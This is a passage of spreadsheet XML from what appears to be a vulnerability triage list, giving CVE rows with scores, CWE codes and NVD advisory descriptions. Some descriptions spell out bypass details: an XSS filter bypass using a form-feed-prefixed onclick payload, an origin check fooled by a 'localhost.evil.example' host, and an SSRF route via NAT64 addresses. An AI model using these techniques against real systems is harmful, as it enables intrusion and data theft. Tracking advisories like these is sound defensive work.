      <c r="M647" s="5" t="inlineStr"/>
      <c r="N647" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O647" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P647" s="5" t="inlineStr"/>
      <c r="Q647" s="5" t="inlineStr">
        <is>
          <t>CWE-926</t>
        </is>
      </c>
      <c r="R647" s="5" t="inlineStr">
        <is>
          <t>Improper export of android application components in Bixby Touch prior to version 4.3.01.17 allows local attackers to access sensitive information.</t>
        </is>
      </c>
      <c r="S647" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21108</t>
        </is>
      </c>
    </row>
    <row r="648">
      <c r="A648" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B648" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C648" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21110</t>
        </is>
      </c>
      <c r="D648" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E648" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F648" s="5" t="inlineStr">
        <is>
          <t>mobile.security@samsung.com</t>
        </is>
      </c>
      <c r="G648" s="5" t="inlineStr"/>
      <c r="H648" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I648" s="5" t="inlineStr"/>
      <c r="J648" s="5" t="inlineStr"/>
      <c r="K648" s="5" t="inlineStr"/>
      <c r="L648" s="5" t="inlineStr"/>
      <c r="M648" s="5" t="inlineStr"/>
      <c r="N648" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O648" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P648" s="5" t="inlineStr"/>
      <c r="Q648" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R648" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in libsavscmn.so prior to One UI 8.5 allows local attackers to execute arbitrary code.</t>
        </is>
      </c>
      <c r="S648" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21110</t>
        </is>
      </c>
    </row>
    <row r="649">
      <c r="A649" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B649" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C649" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21111</t>
        </is>
      </c>
      <c r="D649" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E649" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F649" s="5" t="inlineStr">
        <is>
          <t>mobile.security@samsung.com</t>
        </is>
      </c>
      <c r="G649" s="5" t="inlineStr"/>
      <c r="H649" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I649" s="5" t="inlineStr"/>
      <c r="J649" s="5" t="inlineStr"/>
      <c r="K649" s="5" t="inlineStr"/>
      <c r="L649" s="5" t="inlineStr"/>
      <c r="M649" s="5" t="inlineStr"/>
      <c r="N649" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O649" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P649" s="5" t="inlineStr"/>
      <c r="Q649" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R649" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in libsthmbc.so prior to One UI 8.5 allows local attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="S649" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21111</t>
        </is>
      </c>
    </row>
    <row r="650">
      <c r="A650" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B650" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C650" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53531</t>
        </is>
      </c>
      <c r="D650" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E650" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F650" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G650" s="5" t="inlineStr"/>
      <c r="H650" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I650" s="5" t="inlineStr"/>
      <c r="J650" s="5" t="inlineStr"/>
      <c r="K650" s="5" t="inlineStr"/>
      <c r="L650" s="5" t="inlineStr"/>
      <c r="M650" s="5" t="inlineStr"/>
      <c r="N650" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O650" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P650" s="5" t="inlineStr"/>
      <c r="Q650" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-674</t>
        </is>
      </c>
      <c r="R650" s="5" t="inlineStr">
        <is>
          <t>RaTeX is a KaTeX-compatible math rendering engine written in Rust. Prior to version 0.1.11, RaTeX’s recursive-descent parser recurses one (or more) native stack frame per nesting level at `{`, `\left`, `\sqrt{`, `^{`, etc, with no maximum depth limit. A short, ~10 KB input of nested groups overflows the 8 MB main-thread stack and aborts the process. With `panic = "abort"` (`Cargo.toml:48`), and because a Rust stack overflow is always a fatal `SIGABRT` regardless of panic strategy this is an unrecoverable, whole-process denial of service reachable from a single untrusted LaTeX string. Version 0.1.11 fixes the issue.</t>
        </is>
      </c>
      <c r="S650" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53531</t>
        </is>
      </c>
    </row>
    <row r="651">
      <c r="A651" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B651" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C651" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53965</t>
        </is>
      </c>
      <c r="D651" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E651" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F651" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G651" s="5" t="inlineStr"/>
      <c r="H651" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I651" s="5" t="inlineStr"/>
      <c r="J651" s="5" t="inlineStr"/>
      <c r="K651" s="5" t="inlineStr"/>
      <c r="L651" s="5" t="inlineStr"/>
      <c r="M651" s="5" t="inlineStr"/>
      <c r="N651" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O651" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P651" s="5" t="inlineStr"/>
      <c r="Q651" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R651" s="5" t="inlineStr">
        <is>
          <t>The MCP PHP SDK (Composer package mcp/sdk) is the official Model Context Protocol SDK for PHP. In versions 0.5.0 through 0.7.0, the HTTP client transport reads a Server-Sent Events response stream incrementally and appends each chunk to an in-memory buffer with no upper bound. The buffer is only flushed when an SSE event delimiter, a double newline, is found, so a remote MCP server that streams response bytes without ever sending the delimiter causes the buffer to grow without limit. A malicious, compromised, or man-in-the-middle-controlled server that the client connects to over the HTTP transport can exploit this to exhaust the client process's memory, triggering a fatal allocation error or OS out-of-memory kill and denying service to the MCP client. The issue affects any client using HttpTransport against an untrusted server endpoint and does not require authentication or user interaction beyond initiating the connection. This issue is fixed in version 0.7.1.</t>
        </is>
      </c>
      <c r="S651" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53965</t>
        </is>
      </c>
    </row>
    <row r="652">
      <c r="A652" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B652" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C652" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55371</t>
        </is>
      </c>
      <c r="D652" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E652" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F652" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G652" s="5" t="inlineStr"/>
      <c r="H652" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I652" s="5" t="inlineStr"/>
      <c r="J652" s="5" t="inlineStr"/>
      <c r="K652" s="5" t="inlineStr"/>
      <c r="L652" s="5" t="inlineStr"/>
      <c r="M652" s="5" t="inlineStr"/>
      <c r="N652" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O652" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P652" s="5" t="inlineStr"/>
      <c r="Q652" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-476</t>
        </is>
      </c>
      <c r="R652" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR high-dynamic-range image file format, widely used in the motion picture industry. Versions 3.4.0 through 3.4.12 contain a NULL pointer dereference in the OpenEXRCore function exr_attr_set_bytes(). The public setter validates the top-level exr_attr_bytes_t value pointer but does not verify that the nested type_hint pointer is non-NULL when hint_length is greater than zero. When a caller supplies a positive hint_length together with a NULL type_hint, exr_attr_bytes_create() allocates a destination type-hint buffer and then copies from the NULL source pointer, causing a deterministic crash. The flaw is reachable through the public OpenEXRCore C API and results in a denial of service. The issue is fixed in version 3.4.13.</t>
        </is>
      </c>
      <c r="S652" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55371</t>
        </is>
      </c>
    </row>
    <row r="653">
      <c r="A653" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B653" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C653" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55529</t>
        </is>
      </c>
      <c r="D653" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E653" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F653" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G653" s="5" t="inlineStr"/>
      <c r="H653" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I653" s="5" t="inlineStr"/>
      <c r="J653" s="5" t="inlineStr"/>
      <c r="K653" s="5" t="inlineStr"/>
      <c r="L653" s="5" t="inlineStr"/>
      <c r="M653" s="5" t="inlineStr"/>
      <c r="N653" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O653" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P653" s="5" t="inlineStr"/>
      <c r="Q653" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-346</t>
        </is>
      </c>
      <c r="R653" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.58, the MCP HTTP Stream _validate_origin method accepts request_origin.startswith(allowed), so the attacker-controlled localhost.evil.example HTTP origin matches the localhost allowlist. Without an API key, a malicious webpage can submit tools/call requests to the local MCP server and execute exposed tools. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="S653" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55529</t>
        </is>
      </c>
    </row>
    <row r="654">
      <c r="A654" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B654" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C654" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55678</t>
        </is>
      </c>
      <c r="D654" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E654" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F654" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G654" s="5" t="inlineStr"/>
      <c r="H654" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I654" s="5" t="inlineStr"/>
      <c r="J654" s="5" t="inlineStr"/>
      <c r="K654" s="5" t="inlineStr"/>
      <c r="L654" s="5" t="inlineStr"/>
      <c r="M654" s="5" t="inlineStr"/>
      <c r="N654" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O654" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P654" s="5" t="inlineStr"/>
      <c r="Q654" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="R654" s="5" t="inlineStr">
        <is>
          <t>Arc is an open, SQL-native time-series database for telemetry. From 26.02.1 until 26.06.2, Arc Enterprise clustering accepts cluster join requests without authentication when cluster.enabled is true but cluster.shared_secret is not configured. The defaults in internal/config/config.go set cluster.enabled to false, cluster.cluster_name to arc-cluster, cluster.coordinator_addr to :9100, cluster.shared_secret to an empty value, and cluster.tls_enabled to false, while cmd/arc/main.go requires cluster.shared_secret only when cluster.replication_enabled is true. JoinRequest in internal/cluster/protocol/messages.go accepts attacker-controlled node_id, role, raft_addr, api_addr, and coord_addr values, plus optional auth_nonce, auth_timestamp, and auth_hmac fields. The join path in internal/cluster/coordinator.go validates HMAC authentication only when the configured shared secret is non-empty and otherwise proceeds after only the cluster-name check. An accepted node is marked healthy, added as a Raft voter or registered locally, and becomes available through internal/cluster/registry.go to the routing logic in internal/cluster/router.go. The forwardRequest path in internal/cluster/router.go builds its target from node.APIAddress and copies Authorization and x-api-key headers with the request, so a rogue node selected for a forwarded query or write can receive authentication headers, request bodies, database and measurement names, and operational metadata. Heartbeat in internal/cluster/protocol/messages.go also lacks HMAC fields, and internal/cluster/coordinator.go updates node state from supplied node_id and state values without authentication. An unauthenticated network attacker who can reach the coordinator port and knows the cluster name can therefore become a trusted cluster node, mutate cluster membership, be submitted as a Raft voter, intercept topology-dependent forwarded requests, divert or forge operations, and blackhole or delay traffic. The default standalone configuration is not reachable because cluster.enabled is false, but Enterprise cluster deployments with clustering enabled and no shared secret are affected. This issue is fixed in version 26.06.2.</t>
        </is>
      </c>
      <c r="S654" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55678</t>
        </is>
      </c>
    </row>
    <row r="655">
      <c r="A655" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B655" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C655" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55758</t>
        </is>
      </c>
      <c r="D655" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E655" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F655" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G655" s="5" t="inlineStr"/>
      <c r="H655" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I655" s="5" t="inlineStr"/>
      <c r="J655" s="5" t="inlineStr"/>
      <c r="K655" s="5" t="inlineStr"/>
      <c r="L655" s="5" t="inlineStr"/>
      <c r="M655" s="5" t="inlineStr"/>
      <c r="N655" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O655" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P655" s="5" t="inlineStr"/>
      <c r="Q655" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R655" s="5" t="inlineStr">
        <is>
          <t>CC: Tweaked is a mod for Minecraft which adds programmable computers, turtles, and more to the game. Prior to 1.120.0, the SSRF protection in projects/core/src/main/java/dan200/computercraft/core/apis/http/options/AddressPredicate.java blocks the RFC 6052 64:ff9b::/96 NAT64 prefix but omits the RFC 8215 64:ff9b:1::/48 local-use prefix. On a dual-stack server using RFC 8215 NAT64, an unauthenticated user who can execute Lua code can use http.request or http.websocket with an address under 64:ff9b:1::/48 to reach loopback, RFC 1918, cloud metadata, or internal API endpoints because PrivatePattern.matches() does not classify the mapped IPv6 address as private. This issue is fixed in version 1.120.0.</t>
        </is>
      </c>
      <c r="S655" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55758</t>
        </is>
      </c>
    </row>
    <row r="656">
      <c r="A656" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B656" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C656" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78325</t>
        </is>
      </c>
      <c r="D656" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E656" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F656" s="5" t="inlineStr">
        <is>
          <t>b2fa7fcc-7d08-41f0-853b-11242c5539db</t>
        </is>
      </c>
      <c r="G656" s="5" t="inlineStr"/>
      <c r="H656" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I656" s="5" t="inlineStr"/>
      <c r="J656" s="5" t="inlineStr"/>
      <c r="K656" s="5" t="inlineStr"/>
      <c r="L656" s="5" t="inlineStr"/>
      <c r="M656" s="5" t="inlineStr"/>
      <c r="N656" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O656" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P656" s="5" t="inlineStr"/>
      <c r="Q656" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R656" s="5" t="inlineStr">
        <is>
          <t>Cross-site scripting in the Evernote and Google Keep note importers in Standard Notes for Android through 3.201.24 allows an attacker to execute arbitrary JavaScript in the application context when a victim imports a crafted .enex or Google Keep HTML file, leading to theft of encryption keys and note data, and arbitrary invocation of native device APIs.</t>
        </is>
      </c>
      <c r="S656" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78325</t>
        </is>
      </c>
    </row>
    <row r="657">
      <c r="A657" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B657" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C657" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82398</t>
        </is>
      </c>
      <c r="D657" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E657" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F657" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G657" s="5" t="inlineStr"/>
      <c r="H657" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I657" s="5" t="inlineStr"/>
      <c r="J657" s="5" t="inlineStr"/>
      <c r="K657" s="5" t="inlineStr"/>
      <c r="L657" s="5" t="inlineStr"/>
      <c r="M657" s="5" t="inlineStr"/>
      <c r="N657" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O657" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P657" s="5" t="inlineStr"/>
      <c r="Q657" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="R657" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.15.0, an attacker can craft a PDF that causes long runtimes when the pypdf/_utils.py function read_until_whitespace reads a stream containing a long run of bytes without whitespace. The function repeatedly performs immutable bytes concatenation in a one-byte loop, causing quadratic processing cost for the long non-whitespace input. This issue is fixed in version 6.15.0.</t>
        </is>
      </c>
      <c r="S657" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82398</t>
        </is>
      </c>
    </row>
    <row r="658">
      <c r="A658" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B658" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C658" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83530</t>
        </is>
      </c>
      <c r="D658" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E658" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F658" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@google.com</t>
        </is>
      </c>
      <c r="G658" s="5" t="inlineStr"/>
      <c r="H658" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I658" s="5" t="inlineStr"/>
      <c r="J658" s="5" t="inlineStr"/>
      <c r="K658" s="5" t="inlineStr"/>
      <c r="L658" s="5" t="inlineStr"/>
      <c r="M658" s="5" t="inlineStr"/>
      <c r="N658" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O658" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P658" s="5" t="inlineStr"/>
      <c r="Q658" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="R658" s="5" t="inlineStr">
        <is>
          <t>A user could provide an expression whose string length is longer than the ParserExpressionSizeLimit() configured on the CEL environment, and a memory allocation would occur proportional to the size of the input before the limit would be checked / enforced.</t>
        </is>
      </c>
      <c r="S658" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83530</t>
        </is>
      </c>
    </row>
    <row r="659">
      <c r="A659" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B659" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C659" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84309</t>
        </is>
      </c>
      <c r="D659" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E659" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F659" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G659" s="5" t="inlineStr"/>
      <c r="H659" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I659" s="5" t="inlineStr"/>
      <c r="J659" s="5" t="inlineStr"/>
      <c r="K659" s="5" t="inlineStr"/>
      <c r="L659" s="5" t="inlineStr"/>
      <c r="M659" s="5" t="inlineStr"/>
      <c r="N659" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O659" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P659" s="5" t="inlineStr"/>
      <c r="Q659" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="R659" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.16.0, an attacker can craft a PDF whose cyclic tree structure causes pypdf/generic/_data_structures.py TreeObject.insert_child to follow /Next links indefinitely when a writing code path inserts a child, producing an infinite loop. This issue is fixed in version 6.16.0.</t>
        </is>
      </c>
      <c r="S659" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84309</t>
        </is>
      </c>
    </row>
    <row r="660">
      <c r="A660" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B660" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C660" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86431</t>
        </is>
      </c>
      <c r="D660" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E660" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F660" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G660" s="5" t="inlineStr"/>
      <c r="H660" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I660" s="5" t="inlineStr"/>
      <c r="J660" s="5" t="inlineStr"/>
      <c r="K660" s="5" t="inlineStr">
        <is>
          <t>thephpleague:commonmark</t>
        </is>
      </c>
      <c r="L660" s="5" t="inlineStr"/>
      <c r="M660" s="5" t="inlineStr"/>
      <c r="N660" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O660" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P660" s="5" t="inlineStr"/>
      <c r="Q660" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R660" s="5" t="inlineStr">
        <is>
          <t>league/commonmark (thephpleague/commonmark) versions &gt;= 2.7.0 and &lt; 2.9.1 contain a cross-site scripting vulnerability in the AttributesExtension. Prefixing an attribute name with a single U+000C form feed byte (e.g. {\x0Conclick="alert(1)"}) bypasses the AttributesHelper::filterAttributes() 'on*' event-handler filter because PHP's trim() does not strip U+000C, causing the attribute to be written verbatim into the output where browsers parse it as a genuine event handler. The same prefix also defeats the allow_unsafe_links check, allowing javascript: URIs through href/src attributes even when allow_unsafe_links is false. Exploitation requires processing untrusted Markdown with the AttributesExtension enabled; the injected script executes when the rendered HTML is viewed. Fixed in 2.9.1.</t>
        </is>
      </c>
      <c r="S660" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86431</t>
        </is>
      </c>
    </row>
    <row r="661">
      <c r="A661" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B661" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C661" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86539</t>
        </is>
      </c>
      <c r="D661" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E661" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F661" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G661" s="5" t="inlineStr"/>
      <c r="H661" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I661" s="5" t="inlineStr"/>
      <c r="J661" s="5" t="inlineStr"/>
      <c r="K661" s="5" t="inlineStr"/>
      <c r="L661" s="5" t="inlineStr"/>
      <c r="M661" s="5" t="inlineStr"/>
      <c r="N661" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O661" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P661" s="5" t="inlineStr"/>
      <c r="Q661" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R661" s="5" t="inlineStr">
        <is>
          <t>knowns through 0.33.0 contains a server-side request forgery vulnerability in the POST /api/embedding-models/test endpoint that issues outbound requests to caller-supplied destinations without validation. Attackers can enumerate internal hosts and cloud metadata endpoints by observing transport error messages that reveal network reachability information.</t>
        </is>
      </c>
      <c r="S661" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86539</t>
        </is>
      </c>
    </row>
    <row r="662">
      <c r="A662" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B662" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C662" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86547</t>
        </is>
      </c>
      <c r="D662" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E662" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F662" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G662" s="5" t="inlineStr"/>
      <c r="H662" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I662" s="5" t="inlineStr"/>
      <c r="J662" s="5" t="inlineStr"/>
      <c r="K662" s="5" t="inlineStr"/>
      <c r="L662" s="5" t="inlineStr"/>
      <c r="M662" s="5" t="inlineStr"/>
      <c r="N662" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O662" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P662" s="5" t="inlineStr"/>
      <c r="Q662" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R662" s="5" t="inlineStr">
        <is>
          <t>mrubyc through 4.0.0 contains a null pointer dereference vulnerability in the op_enter() handler in src/vm.c when processing untrusted bytecode. Attackers can craft malicious .mrb bytecode files with OP_ENTER instructions at the top level to crash the embedding application and cause denial of service.</t>
        </is>
      </c>
      <c r="S662" s="6" t="inlineStr">
        <is>
